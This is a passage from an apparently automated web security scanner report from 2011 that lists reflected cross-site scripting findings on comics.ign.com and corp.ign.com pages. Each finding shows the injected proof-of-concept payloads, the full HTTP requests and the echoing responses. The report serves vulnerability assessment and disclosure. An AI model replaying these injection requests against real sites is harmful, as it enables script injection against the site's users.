<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
== '') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://comics.ign.com/index/reviews.html?2a086"-alert(1)-"d310eae1459=1";
return true;
   
   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.126. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd10"><script>alert(1)</script>e21466306a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?1fd10"><script>alert(1)</script>e21466306a4=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:20 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27912-98585012-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:20 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041200983v-1n-12mc+1297041200983mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/reviews.html?1fd10"><script>alert(1)</script>e21466306a4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.127. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/toys.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf36"><script>alert(1)</script>8946fdfb18e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/toys.html?cbf36"><script>alert(1)</script>8946fdfb18e=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:30 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-2034342565-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041210655v-1n-12mc+1297041210655mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 107472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/toys.html?cbf36"><script>alert(1)</script>8946fdfb18e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.128. http://comics.ign.com/index/toys.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/toys.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 764dc"-alert(1)-"0f054e9b56a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/toys.html?764dc"-alert(1)-"0f054e9b56a=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:32 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-101757157-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041212696v-1n-12mc+1297041212696mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 107402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/toys.html?764dc"-alert(1)-"0f054e9b56a=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.129. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b7ed"><script>alert(1)</script>f5dfe5b827b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9b7ed"><script>alert(1)</script>f5dfe5b827b=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:05 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19918-1031545857-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041245432v-1n-12mc+1297041245432mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 41813

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmedia.ign.c
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/?9b7ed"><script>alert(1)</script>f5dfe5b827b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.130. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64dab"-alert(1)-"8250c170f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?64dab"-alert(1)-"8250c170f0f=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:07 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-754088152-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041247165v-1n-12mc+1297041247165mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 41786

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmedia.ign.c
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/?64dab"-alert(1)-"8250c170f0f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.131. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3545f"><script>alert(1)</script>64dc66e49d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/?3545f"><script>alert(1)</script>64dc66e49d8=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:17 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13272-1058715362-10;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:17 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041257624v-1n-12mc+1297041257624mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 11891

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>About - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/about/?3545f"><script>alert(1)</script>64dc66e49d8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.132. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f2a"-alert(1)-"9641413a5ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/?31f2a"-alert(1)-"9641413a5ee=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:18 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32463-1028516919-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:18 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041258856v-1n-12mc+1297041258856mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 11864

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>About - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
ript>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/about/?31f2a"-alert(1)-"9641413a5ee=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.133. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 503cb"-alert(1)-"685e224789c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/?503cb"-alert(1)-"685e224789c=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24287-1051492698-9;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041278968v-1n-12mc+1297041278968mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 13539

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Careers - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/careers/?503cb"-alert(1)-"685e224789c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.134. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bd2"><script>alert(1)</script>5ab56f15f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers/?68bd2"><script>alert(1)</script>5ab56f15f1=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:37 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-23694-975905572-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:37 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041277786v-1n-12mc+1297041277786mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 13567

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Careers - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/careers/?68bd2"><script>alert(1)</script>5ab56f15f1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.135. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f513d"><script>alert(1)</script>ff5d7b0b388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?f513d"><script>alert(1)</script>ff5d7b0b388=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:32 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2421-363698782-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041272498v-1n-12mc+1297041272498mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 39236

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<style>
/*
Copyright (c) 2009, Yahoo! In
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/contact/?f513d"><script>alert(1)</script>ff5d7b0b388=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.136. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f98d"-alert(1)-"8146d2ee5ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/?9f98d"-alert(1)-"8146d2ee5ef=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:34 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-25644-697037626-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:34 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041274241v-1n-12mc+1297041274241mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 39203

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<style>
/*
Copyright (c) 2009, Yahoo! In
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/contact/?9f98d"-alert(1)-"8146d2ee5ef=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.137. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /feeds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 807fa"><script>alert(1)</script>9309c865802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds.html?807fa"><script>alert(1)</script>9309c865802=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-575922217-15;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:51 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041291833v-1n-12mc+1297041291833mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 27855

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Feeds - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/feeds.html?807fa"><script>alert(1)</script>9309c865802=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.138. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /feeds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38ca"-alert(1)-"82e5bbb9546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds.html?e38ca"-alert(1)-"82e5bbb9546=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-1410444593-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041293242v-1n-12mc+1297041293242mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 27825

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Feeds - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/feeds.html?e38ca"-alert(1)-"82e5bbb9546=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.139. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9105f"><script>alert(1)</script>afaaba52a84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy.html?9105f"><script>alert(1)</script>afaaba52a84=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-1241498032-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041289911v-1n-12mc+1297041289911mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 25988

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Privacy Policy - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/privacy.html?9105f"><script>alert(1)</script>afaaba52a84=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.140. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8174"-alert(1)-"21ae41754ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.html?a8174"-alert(1)-"21ae41754ed=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:51 GMT
